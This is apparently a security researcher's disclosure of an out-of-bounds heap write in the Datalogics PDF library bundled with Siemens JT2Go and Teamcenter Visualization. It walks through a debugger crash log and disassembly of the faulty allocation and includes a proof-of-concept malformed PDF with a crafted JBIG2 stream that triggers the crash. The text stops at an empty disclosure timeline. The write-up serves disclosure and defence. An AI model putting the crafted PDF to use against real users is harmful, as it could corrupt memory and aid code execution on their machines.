JT2Go has been unanimously embraced by industry leaders as the premier free viewing tool for JT data. By providing a comprehensive Desktop application and mobile platform solutions on iOS and Android, Siemens has made viewing of JT data available for everyone in nearly any situation. Exact product that was found to be vulnerable including complete version information was Siemens PLM Software JT2Go Siemens Teamcenter Visualization and JT2Go are affected by an out of bounds write vulnerability in APDFL library from Datalogics. If a user is tricked to open a malicious PDF file with the affected products, this could lead the application to crash or potentially lead to arbitrary code execution.
An exploitable out-of-bounds heap write vulnerability exists due to an error in the DL180pdfl!PDNameTreeLookup function when handling a maliciously crafted PDF file. A remote attacker may be able to exploit this to execute arbitrary code within the context of the application, via a crafted PDF file. A specially crafted PDF document can trigger an out-of-bounds write, which can disclose sensitive memory content or even write and aid in exploitation when coupled with another vulnerability. An attacker needs to trick the user to open the malicious file to trigger this vulnerability.
An access violation happened when JT2Go tries to open specially crafted PDF file. If we look at the crash path, it appears r9 is containing an out-of-bounds memory region and it was accessed. The analysis performed on DL180pdf.dll that triggers the vulnerability.
(5b8.6cc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
00007fff`1d0dd0d0 41897904 mov dword ptr [r9+4],edi ds:00000257`ff441000=????????
0:000> .exr -1
ExceptionAddress: 00007fff1d0dd0d0 (DL180pdfl!PDNameTreeLookup+0x0000000000785e8a)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 0000000000000001
Parameter[1]: 00000257ff441000
Attempt to write to address 00000257ff441000
Looking at the crash path, we know that the r9 is containing OOB memory region:
.text:00000001807AD0D0 loc_1807AD0D0:
.text:00000001807AD0D0 mov [r9+4], edi ; crash here
.text:00000001807AD0D4 mov [r9], edi
.text:00000001807AD0D7 mov [r8+4], edi
.text:00000001807AD0DB mov [r8], edi
.text:00000001807AD0DE movzx r13d, [rbp+57h+var_CE]
.text:00000001807AD0E3 xor r13b, 1
.text:00000001807AD0E7 mov [rbp+57h+var_CE], r13b
The pointer was assigned by ASmalloc():
; v20 = *(&v58 + v4);
.text:00000001807ACF50 loc_1807ACF50:
.text:00000001807ACF50 mov esi, 0FFFFFFFFh
.text:00000001807ACF55 mov r14d, r12d
.text:00000001807ACF58 movzx edx, r12w
.text:00000001807ACF5C mov [rbp+57h+var_D0], dx
.text:00000001807ACF60 xor r12b, r12b
.text:00000001807ACF63 mov [rbp+57h+arg_18], r12b
.text:00000001807ACF67 movzx eax, r13b
.text:00000001807ACF6B mov r8, qword ptr [rbp+rax*8+57h+var_80]
.text:00000001807ACF70 mov r9, qword ptr [rbp+rax*8+57h+var_68] ; r9 was assigned with the point to [rbp+rax*8+57h+var_68]
.text:00000001807ACF75 mov [r9], esi
.text:00000001807ACF78 mov [r8], esi
.text:00000001807ACF7B add r8, 4
.text:00000001807ACF7F mov [rbp+57h+var_B8], r8
.text:00000001807ACF83 add r9, 4
This code where it is responsible to assigned the size:
; v7 = 4i64 * (*a2 + 4);
.text:00000001807ACE8F mov ebx, eax
.text:00000001807ACE91 shl rbx, 2
; v11 = ASmalloc(v7);
; *&v58 = v11;
.text:00000001807ACEE6 mov ecx, edi
.text:00000001807ACEE8 call ASmalloc
.text:00000001807ACEED mov rbx, rax
.text:00000001807ACEF0 mov qword ptr [rbp+57h+var_68], rax
The r9 register add up with 4 which change the size of the heap with extra 4 bytes:
; v22 = v20 + 1;
.text:00000001807ACF83 add r9, 4
.text:00000001807ACF87 mov [rbp+57h+var_C8], r9
However when EDI tries to access r9, it appears it tries to access to a pointer that contains out-of-bounds memory region which triggers heap corruption when it writes to OOB memory.
.text:00000001807AD0D0 mov [r9+4], edi ; crash due to heap corruption
.text:00000001807AD0D4 mov [r9], edi
.text:00000001807AD0D7 mov [r8+4], edi
Proof-of-Concept related to the PDF that cause the issue:
1 0 obj
<< /Type /Catalog
/Outlines 2 0 R
/Pages 3 0 R
2 0 obj
<< /Count 0
/Type /Outlines
3 0 obj
<< /Count 1
/Kids [8 0 R]
/Type /Pages
4 0 obj
<< /Length 103
���������\������\ö €üYYYYYPPPPPPPPPPPPPPPPPPPPPPPPPPPpPPPPPPPPPS³:>0¨ÿ+1lV?~~èa"xvi´–„#ÿ¬
5 0 obj
<< /DecodeParms << /JBIG2Globals 4 0 R >>
/Width 32
/ColorSpace /DeviceGray
/Height 32
/Filter /JBIG2Decode
/Subtype /Image
/Length 76
/Type /XObject
/BitsPerComponent 1
���0������� ��� ���G���G������"����"��� ��� ��������������žèTìßë N“ÿ¬
6 0 obj
<< /Length 42
q 32.000000 0 0 32.000000 0 0 cm /Im1 Do Q
7 0 obj
<< /XObject << /Im1 5 0 R >>
/ProcSet [/PDF /ImageB]
8 0 obj
<< /Parent 3 0 R
/Type /Page
/Contents 6 0 R
/Resources 7 0 R
/MediaB‚x [ 0 0 32.000000 32.000000 ]
0 9
0000000000 65535 f
0000000009 00000 n
0000000075 00000 n
0000000122 00000 n
0000000180 00000 n
0000000269 00000 n
0000000553 00000 n
0000000646 00000 n ¡0000000718 00000 n
<< /Size 9
/Root 1 0 R >>
The vulnerability was reported back in March 2022. Timeline of disclosure: